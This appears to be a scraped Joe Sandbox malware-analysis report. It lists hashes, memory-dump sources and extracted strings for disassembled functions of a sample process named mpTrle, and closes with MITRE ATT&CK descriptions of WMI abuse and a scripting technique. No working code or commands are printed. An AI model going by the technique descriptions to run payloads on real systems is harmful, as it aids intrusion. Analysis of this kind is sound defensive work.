Opcode Fuzzy Hash: 18b5bc0f4265ad97a3b398c942431d4701099c4d0adbcd9b84436542bdae25a9
Instruction Fuzzy Hash: 1641F331B006118FDF26DB78C88136E7BA6EFD6310F25896AE406DB394DA34ECC18790

Uniqueness

Uniqueness Score: -1.00%

Function 0039E3E5 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e40e8f0620148e41c09d25ad5029632aae62dec3ac546e71dedef036fdf86acd
Instruction ID: 98b1a22e8347dff3c362fafda96ea53fb0c70027e81882cedc7d8d346265baaa
Opcode Fuzzy Hash: e40e8f0620148e41c09d25ad5029632aae62dec3ac546e71dedef036fdf86acd
Instruction Fuzzy Hash: 3341F2307002058FDF16EF75D49536E3BA2EF8A310BA54969D406DB395EF35DC428BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00395F68 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91ef9d3abb841aa085da3a863911105c2ccaa72821b2c253fa9a4a25ed3e4636
Instruction ID: 0ae66ec4f6b5cf274174643d2759503721bd16bdeed574ce716d3aba3d386391
Opcode Fuzzy Hash: 91ef9d3abb841aa085da3a863911105c2ccaa72821b2c253fa9a4a25ed3e4636
Instruction Fuzzy Hash: 93315C30E112199FDF16CFA8D89579EB7B6EF85310F218526E902EB340EB71AD81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00392158 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6ba7bd73101b306584fe358da0ef8fb6dd548093b72e724e6f0436db749c2a4
Instruction ID: f716917cb14d78f36169f415082d0cbb3cdd2b43d3c4ae2ae674dd023eec72f1
Opcode Fuzzy Hash: f6ba7bd73101b306584fe358da0ef8fb6dd548093b72e724e6f0436db749c2a4
Instruction Fuzzy Hash: 5441EFB0D00749EFDF10CF99C884ADEBBB5FF48314F20842AE819AB254DB75A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0039E2A8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56bd710356e9c03ee62f5dec744ec837eeeeae5d1c1f32754a73de7c6c2371d5
Instruction ID: 59829f920fe19ec64c89a657a769b4e51f583e031c2e0d782c7cbefb0c0c8f57
Opcode Fuzzy Hash: 56bd710356e9c03ee62f5dec744ec837eeeeae5d1c1f32754a73de7c6c2371d5
Instruction Fuzzy Hash: 18318135E002059FCB15DFA4D49469EBBB2EF89310F15892AE846EB350DB70AC42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00398150 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc3a02cfcdd9b987681a9826c93094b3886c3a228990f8cc64d4c1d6bb363a9f
Instruction ID: 5ebfa57981fb5d5993171468412b5ee88f22b263993968bb3a009f2ddd14b2bb
Opcode Fuzzy Hash: fc3a02cfcdd9b987681a9826c93094b3886c3a228990f8cc64d4c1d6bb363a9f
Instruction Fuzzy Hash: AD218634E046099FCF15CFA4D8556DEBBB2AF86300F51862BE851AB351DB70AC43C741

Uniqueness

Uniqueness Score: -1.00%

Function 0039FCA0 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daabada9141748d6d8f91eb71d534555a6d0d55f0551b184339b9eee8eec7369
Instruction ID: fa5b0c6ce6e5b6e822c93abf4243dc8311cadc974111d2bb166ddde321c0215a
Opcode Fuzzy Hash: daabada9141748d6d8f91eb71d534555a6d0d55f0551b184339b9eee8eec7369
Instruction Fuzzy Hash: 5021AD71B002059FCB01DF68D881BAEBBF5EB88310F108026E805EB395E735EC018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00398260 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b62e94423f48de866882a708dc1c61f058588cd9cdcde4f748ead55d9f0a40e7
Instruction ID: b91b21da7b619aea4990216bcd8acf5fac4158d24ef36eb528a59e262854316b
Opcode Fuzzy Hash: b62e94423f48de866882a708dc1c61f058588cd9cdcde4f748ead55d9f0a40e7
Instruction Fuzzy Hash: 25212175E006059BDB15CFA5D48469EB7B6AFC9310F51C526E805AB340DB71AC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0039FCB0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ef1a62cb2ab121ebb1b024c8543643e74e3f0d05196f4ce9514ccfb7e74c53
Instruction ID: 6fe80a9fb45129f6de9b0f1881fb38c31ed7a9a5572d887be2757f868f8f5618
Opcode Fuzzy Hash: 06ef1a62cb2ab121ebb1b024c8543643e74e3f0d05196f4ce9514ccfb7e74c53
Instruction Fuzzy Hash: F5216B75B002199FDF11EF69D881BAEBBF5EB88710F108026E905E7345E735EC418B94

Uniqueness

Uniqueness Score: -1.00%

Function 0023D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655109346.000000000023D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0023D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_23d000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e67faa39d489e419999794706e551d0d69d1d3d8724013d4e5fc060daef6e0f7
Instruction ID: fe7c968522ab6ff8de8dc99697549d90223c50b5847666cfa8c807539332b4c2
Opcode Fuzzy Hash: e67faa39d489e419999794706e551d0d69d1d3d8724013d4e5fc060daef6e0f7
Instruction Fuzzy Hash: AD2104B5624340DFEB18CF24E8C4B16BF65EB84B14F34C569E8494B246C376D867CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00398160 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcd91ab722ab9210a2e0f9f0319ff0bffe5ecece365a2c3c71dc33f9ceec65bf
Instruction ID: 692572c6ce0af1e39e22efb6b81d0c7e0f11dbae6a4a140e33a615dac1f4c12d
Opcode Fuzzy Hash: dcd91ab722ab9210a2e0f9f0319ff0bffe5ecece365a2c3c71dc33f9ceec65bf
Instruction Fuzzy Hash: 37215031E006199BCF09CFA4D85469EB7B2AFCA300F21852AE816FB340DB70AC42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00394DF8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 470ce7a552cdd0d060b87afa0c2628ebdd9d75cff329f401d0f5f1f034c6f7ec
Instruction ID: eab9683ed399d473a71bfacffdce089c9be4976cf590306048c3cb3a804e01b1
Opcode Fuzzy Hash: 470ce7a552cdd0d060b87afa0c2628ebdd9d75cff329f401d0f5f1f034c6f7ec
Instruction Fuzzy Hash: 10212A34B01205CFDB16EB78D998AAEB7F1BF49300B1004A9D506EB3A0DB329D41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 003916F0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82999ff66f4b1bb6362180d6a60047cdbc9ef98d0b3b86abca057f31091e9ebf
Instruction ID: 13189906cc9ad093c10cead37d028e8962f139e92203a006725d8f9b379babaa
Opcode Fuzzy Hash: 82999ff66f4b1bb6362180d6a60047cdbc9ef98d0b3b86abca057f31091e9ebf
Instruction Fuzzy Hash: CD212834B00246CFDF26EBB4D5546AE77F6AB89340F2004A9D406FB7A0DB369D41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00391700 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d59e387bcbec55f44b70cc604b2a8e85b24bc13acb922dd1001b08d687761918
Instruction ID: 248193491248adb6ac2765517c658dd94aac97c8ba389ff8086062c66a4cb5d6
Opcode Fuzzy Hash: d59e387bcbec55f44b70cc604b2a8e85b24bc13acb922dd1001b08d687761918
Instruction Fuzzy Hash: 6C21F534B00206CFDF16EBB4C555AAE77F6AB89340F200469D506EB7A0EB369D41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00391528 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3a31a5ef1a717375f696520ac19f86e001161bc4ec9f18787a5c2137d35d554
Instruction ID: 606451147f0c06a6bbbb963f5e3dac15c82dd1fcf2ca2cf4aa06484f51abeeb4
Opcode Fuzzy Hash: a3a31a5ef1a717375f696520ac19f86e001161bc4ec9f18787a5c2137d35d554
Instruction Fuzzy Hash: 1721D575A102054FEF22EBA9F8C971D376AE785325F524E31E00ACB254DA34EC558B92

Uniqueness

Uniqueness Score: -1.00%

Function 004515C2 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ab382544df66b10f07a7fae445f72cfaca32b276693d56aaf27ee7a3a6c2ca
Instruction ID: d31c3ddde0dbf1b02bd2c5d27be9823bb35b542376a0213076cd50cfd908192c
Opcode Fuzzy Hash: 74ab382544df66b10f07a7fae445f72cfaca32b276693d56aaf27ee7a3a6c2ca
Instruction Fuzzy Hash: D021A834A01209CFCF14DB94D685AAEB7B6FF48306F288556E841AB356D734AC8ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 00394E08 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 053ed1e3628073f47e6c641dbb3e88f96c58ae262da06edee3b604f30c5ab4be
Instruction ID: 9438e47aef323c56f8ac63de3325ddf27a660ff953937a6850bfc9d73bc650a0
Opcode Fuzzy Hash: 053ed1e3628073f47e6c641dbb3e88f96c58ae262da06edee3b604f30c5ab4be
Instruction Fuzzy Hash: 6421E634B00205CFDB55EB78D998AAEB7F5BB89300F104468E506EB3A0EB329D41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00390838 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c845f5dae265a6e4689d9706fe8d229e9c28f39fdfe8a8457f5c4cf46898c2
Instruction ID: 9b1f21ff0bdd25e5a565f31cdaec2f3df3662c3ae6d7950155e779885376ae6f
Opcode Fuzzy Hash: c7c845f5dae265a6e4689d9706fe8d229e9c28f39fdfe8a8457f5c4cf46898c2
Instruction Fuzzy Hash: 051106317082045FEF2B5B79D84037937A9EF86314F22497AD046CF241DB25DD458BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00396778 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3fb1b81001fe023c1a05c1c4f3216aa3e8371d5e24dbf3ebc196f8b6418850a
Instruction ID: 9a9088d35b36d2e9bd90e9728c831be47460469f34d0e09fb1259847324e1b2d
Opcode Fuzzy Hash: d3fb1b81001fe023c1a05c1c4f3216aa3e8371d5e24dbf3ebc196f8b6418850a
Instruction Fuzzy Hash: C721E2B1901619DFCB00DFAAD884BDEFFB4FF49311F10856AE518A7210C374A554CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0023D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655109346.000000000023D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0023D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_23d000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b800a097d35e0454651e0faae2a150f0987d01798cf973450317b64ef486ba19
Instruction ID: 9878f02189038d589e1680d34a6bd177b9413a91940887d3e36cd66d24bb5d90
Opcode Fuzzy Hash: b800a097d35e0454651e0faae2a150f0987d01798cf973450317b64ef486ba19
Instruction Fuzzy Hash: FC2171755083809FCB06CF24D994711BF71EB46714F28C5DAD8458F266C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00390848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbae19213a40bc23c443c22e54dec0358cc97f92641666c950d3cad9666ed043
Instruction ID: f22e11e065b71977de8e16b770804943aa63a187925713ea7fa05e42b0639c73
Opcode Fuzzy Hash: cbae19213a40bc23c443c22e54dec0358cc97f92641666c950d3cad9666ed043
Instruction Fuzzy Hash: 3C118231B042049FEF6AAB79E44437A3799FB86324F214939E006CF251DB25CD458BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00391638 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ee08fe9a5ff8bab6f22b17b490ffc447878a7004d3e82ebe07b82b6b7efae7
Instruction ID: 726f7f3e337001dc47d5dca25dc5ce169bdb572ddce3a4e3a466d91755962dc2
Opcode Fuzzy Hash: b1ee08fe9a5ff8bab6f22b17b490ffc447878a7004d3e82ebe07b82b6b7efae7
Instruction Fuzzy Hash: 91110E36F002019FCF11AB78AC8875F7FFAAB89350F140666E942E7354EA349842CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0039FDC0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85eeacd6f61de8eea13aacc93643a383a6d34e0d41d3ac40c49ac1dad8675787
Instruction ID: 5cf41f623b9d3b57d93e472fe6b9d638a4c8b6e668e669cd97cd99c984fd420e
Opcode Fuzzy Hash: 85eeacd6f61de8eea13aacc93643a383a6d34e0d41d3ac40c49ac1dad8675787
Instruction Fuzzy Hash: 33118432B001288FCF55AA78DC547AE77EAEBC8355F11853AD406E7354EE65EC0287D1

Uniqueness

Uniqueness Score: -1.00%

Function 00459158 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4dbf90693add9d6ad0df0d8cfeb11973b29c719ec1877e630e2f3ab26fcf376
Instruction ID: 16016a08993041b71f332db6476a6ca247b5a97ede11191c41c806c91f4ea78d
Opcode Fuzzy Hash: b4dbf90693add9d6ad0df0d8cfeb11973b29c719ec1877e630e2f3ab26fcf376
Instruction Fuzzy Hash: DD01F5307045214FDB118B78586872F6BE6CBC6311F24846BE40AC7341DA29DC078385

Uniqueness

Uniqueness Score: -1.00%

Function 0039678C Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b7056fdb74628d4970c6497ff6728b1cff143c140f3e2b2b2fddfca7e71f39f
Instruction ID: 608eefd610215f5a7e75f5f6ec3b4d81f961db0761cad63e3fb901d4a95b935c
Opcode Fuzzy Hash: 8b7056fdb74628d4970c6497ff6728b1cff143c140f3e2b2b2fddfca7e71f39f
Instruction Fuzzy Hash: B921C0B1901219AFCB00CF9AD884ADEFBB4FB49350F50852AE918B7200C374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00391488 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb9afd7927f8899af193a7a9bf83582c9df0073babce79d99461c41d9c46754b
Instruction ID: 084b3c076bcf1631b63df00e45654d5e20f2cd3f21458e3ffca8c6412f75eb62
Opcode Fuzzy Hash: fb9afd7927f8899af193a7a9bf83582c9df0073babce79d99461c41d9c46754b
Instruction Fuzzy Hash: D4012D36E012258FCF26EFB984451AE7BF5EF89310F26047AD406EB341EA35C9418B91

Uniqueness

Uniqueness Score: -1.00%

Function 0039FDB0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e0b8db887cd970748548ca0d2a202ca0253ba6be4f1ad83cf1a5ba76073b846
Instruction ID: eae7405b0a883eee1a88bc573c9df8d4aaed37dc194b9e9241353c6ed60d3da7
Opcode Fuzzy Hash: 0e0b8db887cd970748548ca0d2a202ca0253ba6be4f1ad83cf1a5ba76073b846
Instruction Fuzzy Hash: 4F018F32B000185FCF56AA799C157EF77AADBC9360F01413AE546D7388EE64AC0287D1

Uniqueness

Uniqueness Score: -1.00%

Function 004501B8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 190f2adbd58e310c3e8d5cb945d4cbb42e10cfc15b9ae4bbce9afdcafabea1d1
Instruction ID: aaea99e564fc0e216119cd0fb0a3202dba2d7efac38dd789f62e4ae8f576e2a5
Opcode Fuzzy Hash: 190f2adbd58e310c3e8d5cb945d4cbb42e10cfc15b9ae4bbce9afdcafabea1d1
Instruction Fuzzy Hash: F50162357005140BDB249AAD985971FA7DADBC9711F10843BF50EC7345D979EC068395

Uniqueness

Uniqueness Score: -1.00%

Function 00459168 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6db65ca643381451e5fd6a53061ec2dc47bd588ab140ff32f320e64bb92863b9
Instruction ID: ad0d02735eaa561604203d1d04f06a930d571775556488eb8c3809a5c4a2081a
Opcode Fuzzy Hash: 6db65ca643381451e5fd6a53061ec2dc47bd588ab140ff32f320e64bb92863b9
Instruction Fuzzy Hash: BC018131B005254BEB24DA7D985872F67DBDBC9721F20883BE90ACB341DE29EC0643D9

Uniqueness

Uniqueness Score: -1.00%

Function 004546D0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be9794ae948cabaf100d87028b52a996edd1057242d4aafc6fd56dfb1a76ac3
Instruction ID: e25f099e8036da0772ac5b0ca651635d327cda5a90e9efcf91400718b72f0d33
Opcode Fuzzy Hash: 3be9794ae948cabaf100d87028b52a996edd1057242d4aafc6fd56dfb1a76ac3
Instruction Fuzzy Hash: 090181307001144FDB20EA7CE854B2B77DADBCA315F20843AE50ACF345EB29EC458784

Uniqueness

Uniqueness Score: -1.00%

Function 0039E39F Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a52a1dd41fd32bec9b48cffed3e6b90207682c8e0b3a849297ec1b9738dd615
Instruction ID: bbbaae2fa7f8a8ed784f921683467bb70f7ad687a9ca4e68fba66fc35d6575c6
Opcode Fuzzy Hash: 3a52a1dd41fd32bec9b48cffed3e6b90207682c8e0b3a849297ec1b9738dd615
Instruction Fuzzy Hash: 76011A39B00204DFCB15CFA4C8A8A9EBBF2AF88320F10C429D44AD7765DB34AC42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00397100 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f4fc3bf6d5b6829e0979997caa68e6cbdd6daf172cf0832e7e3b6f8cb49323
Instruction ID: fe85346506e5176c5b10934bb3fba30d5f0734ee7e7f043ed6db26bd45c8fd7f
Opcode Fuzzy Hash: b0f4fc3bf6d5b6829e0979997caa68e6cbdd6daf172cf0832e7e3b6f8cb49323
Instruction Fuzzy Hash: 1DF03174A1530CAFD740FFF5F88269D7BB6EB80311F504579D1099B254DE702E558B82

Uniqueness

Uniqueness Score: -1.00%

Function 00452670 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85cf0edeac110c4295e913f50828f069e63c3159ba6b7b70e50ed937157d4022
Instruction ID: 6f8281ae03fd6c440afaf6adec08174901edaff28caf4ce4b50b3cf864be3727
Opcode Fuzzy Hash: 85cf0edeac110c4295e913f50828f069e63c3159ba6b7b70e50ed937157d4022
Instruction Fuzzy Hash: F5F08235A04214DFCB28AE50EB847AE77B4EB95312F2404A3DC01E7252C3F89D9ACB54

Uniqueness

Uniqueness Score: -1.00%

Function 004552E0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adc04fd76bdfc3332afb36d09165596145dc0b140ccf20da5e26c6c2c1a7e388
Instruction ID: 40af004379b8d15f20368443bd468beed6d68ea5df20bc05ec8181eee6d28f0a
Opcode Fuzzy Hash: adc04fd76bdfc3332afb36d09165596145dc0b140ccf20da5e26c6c2c1a7e388
Instruction Fuzzy Hash: B0E09A32E002289BDF249AA9A8145AFBBA9E785761F10043BED0AE7300D561AC098391

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004591F1 Relevance: 5.2, Strings: 4, Instructions: 207COMMON

Download Yara Rule

Strings

|p}, xrefs: 004592ED
ho}, xrefs: 00459393
ho}, xrefs: 00459437
|n}, xrefs: 0045934C

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID: ho}$ho}$|n}$|p}
API String ID: 0-3148677294
Opcode ID: 33f850d345223644b6a3ccd2652a7c2dace9bfeb4ec051fa944128c3dba4e3b0
Instruction ID: 08968a396bf500483ea4682690a32262fc4015914294d8c001911bd3052d2f2b
Opcode Fuzzy Hash: 33f850d345223644b6a3ccd2652a7c2dace9bfeb4ec051fa944128c3dba4e3b0
Instruction Fuzzy Hash: 2D715531A04315CFDB14CFA5C44569EBBB2EF85301F24866BD805AB346EB74ED86CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

